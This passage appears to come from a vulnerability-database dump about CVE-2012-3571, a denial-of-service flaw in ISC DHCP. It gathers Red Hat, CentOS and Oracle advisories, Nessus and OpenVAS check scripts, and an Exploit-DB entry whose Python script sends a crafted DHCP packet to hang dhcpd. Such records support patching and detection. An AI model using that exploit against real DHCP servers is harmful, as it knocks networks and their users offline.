exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"dhclient\", rpm:\"dhclient~4.1.1~31.P1.el6_3.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~4.1.1~31.P1.el6_3.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~4.1.1~31.P1.el6_3.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~4.1.1~31.P1.el6_3.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.1, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "centos": [{"lastseen": "2019-12-20T18:29:03", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3571"], "description": "**CentOS Errata and Security Advisory** CESA-2012:1140\n\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that allows\nindividual devices on an IP network to get their own network configuration\ninformation, including an IP address, a subnet mask, and a broadcast\naddress.\n\nA denial of service flaw was found in the way the dhcpd daemon handled\nzero-length client identifiers. A remote attacker could use this flaw to\nsend a specially-crafted request to dhcpd, possibly causing it to enter an\ninfinite loop and consume an excessive amount of CPU time. (CVE-2012-3571)\n\nUpstream acknowledges Markus Hietava of the Codenomicon CROSS project as\nthe original reporter of this issue.\n\nUsers of DHCP should upgrade to these updated packages, which contain a\nbackported patch to correct this issue. After installing this update, all\nDHCP servers will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-August/030821.html\n\n**Affected packages:**\ndhclient\ndhcp\ndhcp-devel\nlibdhcp4client\nlibdhcp4client-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-1140.html", "edition": 3, "modified": "2012-08-03T04:02:49", "published": "2012-08-03T04:02:49", "href": "http://lists.centos.org/pipermail/centos-announce/2012-August/030821.html", "id": "CESA-2012:1140", "title": "dhclient, dhcp, libdhcp4client security update", "type": "centos", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-20T18:25:22", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3954", "CVE-2012-3571"], "description": "**CentOS Errata and Security Advisory** CESA-2012:1141\n\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that allows\nindividual devices on an IP network to get their own network configuration\ninformation, including an IP address, a subnet mask, and a broadcast\naddress.\n\nA denial of service flaw was found in the way the dhcpd daemon handled\nzero-length client identifiers. A remote attacker could use this flaw to\nsend a specially-crafted request to dhcpd, possibly causing it to enter an\ninfinite loop and consume an excessive amount of CPU time. (CVE-2012-3571)\n\nTwo memory leak flaws were found in the dhcpd daemon. A remote attacker\ncould use these flaws to cause dhcpd to exhaust all available memory by\nsending a large number of DHCP requests. (CVE-2012-3954)\n\nUpstream acknowledges Markus Hietava of the Codenomicon CROSS project as\nthe original reporter of CVE-2012-3571, and Glen Eustace of Massey\nUniversity, New Zealand, as the original reporter of CVE-2012-3954.\n\nUsers of DHCP should upgrade to these updated packages, which contain\nbackported patches to correct these issues. After installing this update,\nall DHCP servers will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-August/030823.html\n\n**Affected packages:**\ndhclient\ndhcp\ndhcp-common\ndhcp-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-1141.html", "edition": 3, "modified": "2012-08-03T04:31:47", "published": "2012-08-03T04:31:47", "href": "http://lists.centos.org/pipermail/centos-announce/2012-August/030823.html", "id": "CESA-2012:1141", "title": "dhclient, dhcp security update", "type": "centos", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}], "exploitdb": [{"lastseen": "2016-02-04T06:03:19", "description": "ISC DHCP 4.x Multiple Denial of Service Vulnerabilities. CVE-2012-3571. Dos exploit for linux platform", "published": "2012-07-25T00:00:00", "type": "exploitdb", "title": "ISC DHCP 4.x Multiple Denial of Service Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-3571"], "modified": "2012-07-25T00:00:00", "id": "EDB-ID:37538", "href": "https://www.exploit-db.com/exploits/37538/", "sourceData": "source: http://www.securityfocus.com/bid/54665/info\r\n\r\nISC DHCP is prone to multiple denial-of-service vulnerabilities.\r\n\r\nAn attacker can exploit these issues to cause the affected application to crash, resulting in a denial-of-service condition. \r\n\r\n#!/usr/bin/python\r\n'''\r\n SC DHCP 4.1.2 <> 4.2.4 and 4.1-ESV <> 4.1-ESV-R6 remote denial of\r\n service(infinite loop and CPU consumption/chew) via zero'ed client name length\r\n \r\nhttp://www.k1p0d.com\r\n \r\n'''\r\n \r\nimport socket\r\nimport getopt\r\nfrom sys import argv\r\n \r\ndef main():\r\n args = argv[1:]\r\n try:\r\n args, useless = getopt.getopt(args, 'p:h:')\r\n args = dict(args)\r\n args['-p']\r\n args['-h']\r\n except:\r\n usage(argv[0])\r\n exit(-1)\r\n \r\n dhcp_req_packet = ('\\x01\\x01\\x06\\x00\\x40\\x00\\x03\\x6f'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x22\\x5f\\xae'\r\n '\\xa7\\xdf\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x63\\x82\\x53\\x63'\r\n '\\x35\\x01\\x03\\x32\\x04\\x0a\\x00\\x00'\r\n '\\x01\\x0c\\x00'\r\n '\\x37\\x0d\\x01\\x1c\\x02\\x03\\x0f'\r\n '\\x06\\x77\\x0c\\x2c\\x2f\\x1a\\x79\\x2a'\r\n '\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00')\r\n \r\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n sock.connect((args['-h'], int(args['-p'])))\r\n sock.sendall(dhcp_req_packet)\r\n print 'Packet sent'\r\n sock.close()\r\n \r\ndef usage(pyname):\r\n print '''\r\n Usage: %s -h <host> -p <port>\r\n''' % pyname\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n", "cvss": {"score": 6.1, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/37538/"}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:30", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3571"], "description": "[12:3.0.5-31.1]\n- An error in the handling of malformed client identifiers can\n cause a denial-of-service condition in affected servers. (CVE-2012-3571, #843124)", "edition": 4, "modified": "2012-08-02T00:00:00", "published": "2012-08-02T00:00:00", "id": "ELSA-2012-1140", "href": "http://linux.oracle.com/errata/ELSA-2012-1140.html", "title": "dhcp security update", "type": "oraclelinux", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:09", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3954", "CVE-2012-3571"], "description": "[12:4.1.1-31.P1.0.1.el6_3.1]\n- Added oracle-errwarn-message.patch\n[12:4.1.1-31.P1.1]\n- An error in the handling of malformed client identifiers can\n cause a denial-of-service condition in affected servers. (CVE-2012-3571, #843120)\n- Memory Leaks Found In ISC DHCP (CVE-2012-3954, #843120)", "edition": 4, "modified": "2012-08-02T00:00:00", "published": "2012-08-02T00:00:00", "id": "ELSA-2012-1141", "href": "http://linux.oracle.com/errata/ELSA-2012-1141.html", "title": "dhcp security update", "type": "oraclelinux", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:38:40", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3954", "CVE-2012-3955", "CVE-2012-3571"], "description": "[12:4.1.1-34.P1.0.1.el6]\n- Added oracle-errwarn-message.patch\n[12:4.1.1-34.P1]\n- Reducing the expiration time for an IPv6 lease may cause the server to crash\n (CVE-2012-3955, #858130)\n[12:4.1.1-33.P1]\n- Use getifaddrs() for interface discovery code on Linux (#803540)\n- dhclient-script: do not backup&restore /etc/resolv.conf (#824622)\n[12:4.1.1-32.P1]\n- An error in the handling of malformed client identifiers can\n cause a denial-of-service condition in affected servers. (CVE-2012-3571, #843122)\n- Memory Leaks Found In ISC DHCP (CVE-2012-3954, #843122)", "edition": 4, "modified": "2013-02-22T00:00:00", "published": "2013-02-22T00:00:00", "id": "ELSA-2013-0504", "href": "http://linux.oracle.com/errata/ELSA-2013-0504.html", "title": "dhcp security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:40", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3571"], "description": "The Dynamic Host Configuration Protocol (DHCP) is a protocol that allows\nindividual devices on an IP network to get their own network configuration\ninformation, including an IP address, a subnet mask, and a broadcast\naddress.\n\nA denial of service flaw was found in the way the dhcpd daemon handled\nzero-length client identifiers. A remote attacker could use this flaw to\nsend a specially-crafted request to dhcpd, possibly causing it to enter an\ninfinite loop and consume an excessive amount of CPU time. (CVE-2012-3571)\n\nUpstream acknowledges Markus Hietava of the Codenomicon CROSS project as\nthe original reporter of this issue.\n\nUsers of DHCP should upgrade to these updated packages, which contain a\nbackported patch to correct this issue. After installing this update, all\nDHCP servers will be restarted automatically.\n", "modified": "2017-09-08T12:17:28", "published": "2012-08-03T04:00:00", "id": "RHSA-2012:1140", "href": "https://access.redhat.com/errata/RHSA-2012:1140", "type": "redhat", "title": "(RHSA-2012:1140) Moderate: dhcp security update", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:46:27", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3571", "CVE-2012-3954"], "description": "The Dynamic Host Configuration Protocol (DHCP) is a protocol that allows\nindividual devices on an IP network to get their own network configuration\ninformation, including an IP address, a subnet mask, and a broadcast\naddress.\n\nA denial of service flaw was found in the way the dhcpd daemon handled\nzero-length client identifiers. A remote attacker could use this flaw to\nsend a specially-crafted request to dhcpd, possibly causing it to enter an\ninfinite loop and consume an excessive amount of CPU time. (CVE-2012-3571)\n\nTwo memory leak flaws were found in the dhcpd daemon. A remote attacker\ncould use these flaws to cause dhcpd to exhaust all available memory by\nsending a large number of DHCP requests. (CVE-2012-3954)\n\nUpstream acknowledges Markus Hietava of the Codenomicon CROSS project as\nthe original reporter of CVE-2012-3571, and Glen Eustace of Massey\nUniversity, New Zealand, as the original reporter of CVE-2012-3954.\n\nUsers of DHCP should upgrade to these updated packages, which contain\nbackported patches to correct these issues. After installing this update,\nall DHCP servers will be restarted automatically.\n", "modified": "2018-06-06T20:24:34", "published": "2012-08-03T04:00:00", "id": "RHSA-2012:1141", "href": "https://access.redhat.com/errata/RHSA-2012:1141", "type": "redhat", "title": "(RHSA-2012:1141) Moderate: dhcp security update", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:44:38", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0441", "CVE-2012-2313", "CVE-2012-2337", "CVE-2012-2625", "CVE-2012-3406", "CVE-2012-3440", "CVE-2012-3571", "CVE-2012-3817"], "description": "The rhev-hypervisor5 package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization\nHypervisor is a dedicated Kernel-based Virtual Machine (KVM) hypervisor.\nIt includes everything necessary to run and manage virtual machines: A\nsubset of the Red Hat Enterprise Linux operating environment and the Red\nHat Enterprise Virtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions.\n\nIt was discovered that the formatted printing functionality in glibc did\nnot properly restrict the use of alloca(). This could allow an attacker to\nbypass FORTIFY_SOURCE protections and execute arbitrary code using a format\nstring flaw in an application, even though these protections are expected\nto limit the impact of such flaws to an application abort. (CVE-2012-3406)\n\nThis updated package provides updated components that include fixes for\nvarious security issues. These issues have no security impact on Red Hat\nEnterprise Virtualization Hypervisor itself, however. The security fixes\nincluded in this update address the following CVE numbers:\n\nCVE-2012-3817 (bind issue)\n\nCVE-2012-3571 (dhcp issue)\n\nCVE-2012-2313 (kernel issue)\n\nCVE-2012-0441 (nss issue)\n\nCVE-2012-2337 and CVE-2012-3440 (sudo issues)\n\nCVE-2012-2625 (xen issue)\n\nUsers of Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package, which fixes these issues.\n", "modified": "2019-03-22T23:44:55", "published": "2012-08-21T04:00:00", "id": "RHSA-2012:1185", "href": "https://access.redhat.com/errata/RHSA-2012:1185", "type": "redhat", "title": "(RHSA-2012:1185) Moderate: rhev-hypervisor5 security and bug fix update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:45:49", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1078", "CVE-2012-0441", "CVE-2012-1013", "CVE-2012-1015", "CVE-2012-2337", "CVE-2012-2383", "CVE-2012-2668", "CVE-2012-3404", "CVE-2012-3405", "CVE-2012-3406", "CVE-2012-3571", "CVE-2012-3817", "CVE-2012-3954"], "description": "The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor\nis a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes\neverything necessary to run and manage virtual machines: A subset of the\nRed Hat Enterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions.\n\nMultiple errors in glibc's formatted printing functionality could allow an\nattacker to bypass FORTIFY_SOURCE protections and execute arbitrary code\nusing a format string flaw in an application, even though these protections\nare expected to limit the impact of such flaws to an application abort.\n(CVE-2012-3404, CVE-2012-3405, CVE-2012-3406)\n\nThis updated package provides updated components that include fixes for\nvarious security issues. These issues have no security impact on Red Hat\nEnterprise Virtualization Hypervisor itself, however. The security fixes\nincluded in this update address the following CVE numbers:\n\nCVE-2012-3817 (bind issue)\n\nCVE-2012-3571 and CVE-2012-3954 (dhcp issues)\n\nCVE-2011-1078 and CVE-2012-2383 (kernel issues)\n\nCVE-2012-1013 and CVE-2012-1015 (krb5 issues)\n\nCVE-2012-0441 (nss issue)\n\nCVE-2012-2668 (openldap issue)\n\nCVE-2012-2337 (sudo issue)\n\nUsers of Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package, which fixes these issues.\n", "modified": "2018-06-07T08:59:35", "published": "2012-08-23T04:00:00", "id": "RHSA-2012:1200", "href": "https://access.redhat.com/errata/RHSA-2012:1200", "type": "redhat", "title": "(RHSA-2012:1200) Moderate: rhev-hypervisor6 security and bug fix update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-06T09:27:54", "description": "Updated dhcp packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that\nallows individual devices on an IP network to get their own network\nconfiguration information, including an IP address, a subnet mask, and\na broadcast address.\n\nA denial of service flaw was found in the way the dhcpd daemon handled\nzero-length client identifiers. A remote attacker could use this flaw\nto send a specially crafted request to dhcpd, possibly causing it to\nenter an infinite loop and consume an excessive amount of CPU time.\n(CVE-2012-3571)\n\nUpstream acknowledges Markus Hietava of the Codenomicon CROSS project\nas the original reporter of this issue.\n\nUsers of DHCP should upgrade to these updated packages, which contain\na backported patch to correct this issue. After installing this\nupdate, all DHCP servers will be restarted automatically.", "edition": 24, "published": "2012-08-03T00:00:00", "title": "CentOS 5 : dhcp (CESA-2012:1140)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3571"], "modified": "2012-08-03T00:00:00", "cpe": ["p-cpe:/a:centos:centos:libdhcp4client-devel", "p-cpe:/a:centos:centos:dhclient", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:dhcp", "p-cpe:/a:centos:centos:dhcp-devel", "p-cpe:/a:centos:centos:libdhcp4client"], "id": "CENTOS_RHSA-2012-1140.NASL", "href": "https://www.tenable.com/plugins/nessus/61400", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:1140 and \n# CentOS Errata and Security Advisory 2012:1140 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61400);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2012-3571\");\n script_bugtraq_id(54665);\n script_xref(name:\"RHSA\", value:\"2012:1140\");\n\n script_name(english:\"CentOS 5 : dhcp (CESA-2012:1140)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated dhcp packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that\nallows individual devices on an IP network to get their own network\nconfiguration information, including an IP address, a subnet mask, and\na broadcast address.\n\nA denial of service flaw was found in the way the dhcpd daemon handled\nzero-length client identifiers. A remote attacker could use this flaw\nto send a specially crafted request to dhcpd, possibly causing it to\nenter an infinite loop and consume an excessive amount of CPU time.\n(CVE-2012-3571)\n\nUpstream acknowledges Markus Hietava of the Codenomicon CROSS project\nas the original reporter of this issue.\n\nUsers of DHCP should upgrade to these updated packages, which contain\na backported patch to correct this issue. After installing this\nupdate, all DHCP servers will be restarted automatically.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-August/018783.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?43037365\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected dhcp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-3571\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:dhclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:dhcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:dhcp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libdhcp4client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libdhcp4client-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/07/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/08/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"dhclient-3.0.5-31.el5_8.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"dhcp-3.0.5-31.el5_8.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"dhcp-devel-3.0.5-31.el5_8.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"libdhcp4client-3.0.5-31.el5_8.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"libdhcp4client-devel-3.0.5-31.el5_8.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dhclient / dhcp / dhcp-devel / libdhcp4client / etc\");\n}\n", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-17T13:46:46", "description": "The Dynamic Host Configuration Protocol (DHCP) is a protocol that\nallows individual devices on an IP network to get their own network\nconfiguration information, including an IP address, a subnet mask, and\na broadcast address.\n\nA denial of service flaw was found in the way the dhcpd daemon handled\nzero-length client identifiers. A remote attacker could use this flaw\nto send a specially crafted request to dhcpd, possibly causing it to\nenter an infinite loop and consume an excessive amount of CPU time.\n(CVE-2012-3571)\n\nUsers of DHCP should upgrade to these updated packages, which contain\na backported patch to correct this issue. After installing this\nupdate, all DHCP servers will be restarted automatically.", "edition": 14, "published": "2012-08-06T00:00:00", "title": "Scientific Linux Security Update : dhcp on SL5.x i386/x86_64 (20120803)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3571"], "modified": "2012-08-06T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:dhcp-debuginfo", "p-cpe:/a:fermilab:scientific_linux:dhclient", "p-cpe:/a:fermilab:scientific_linux:dhcp-devel", "p-cpe:/a:fermilab:scientific_linux:libdhcp4client", "p-cpe:/a:fermilab:scientific_linux:dhcp", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:libdhcp4client-devel"], "id": "SL_20120803_DHCP_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61427", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61427);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-3571\");\n\n script_name(english:\"Scientific Linux Security Update : dhcp on SL5.x i386/x86_64 (20120803)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Dynamic Host Configuration Protocol (DHCP) is a protocol that\nallows individual devices on an IP network to get their own network\nconfiguration information, including an IP address, a subnet mask, and\na broadcast address.\n\nA denial of service flaw was found in the way the dhcpd daemon handled\nzero-length client identifiers. A remote attacker could use this flaw\nto send a specially crafted request to dhcpd, possibly causing it to\nenter an infinite loop and consume an excessive amount of CPU time.\n(CVE-2012-3571)\n\nUsers of DHCP should upgrade to these updated packages, which contain\na backported patch to correct this issue. After installing this\nupdate, all DHCP servers will be restarted automatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1208&L=scientific-linux-errata&T=0&P=997\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bc294e00\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:dhclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:dhcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:dhcp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:dhcp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libdhcp4client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libdhcp4client-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/07/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/08/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n 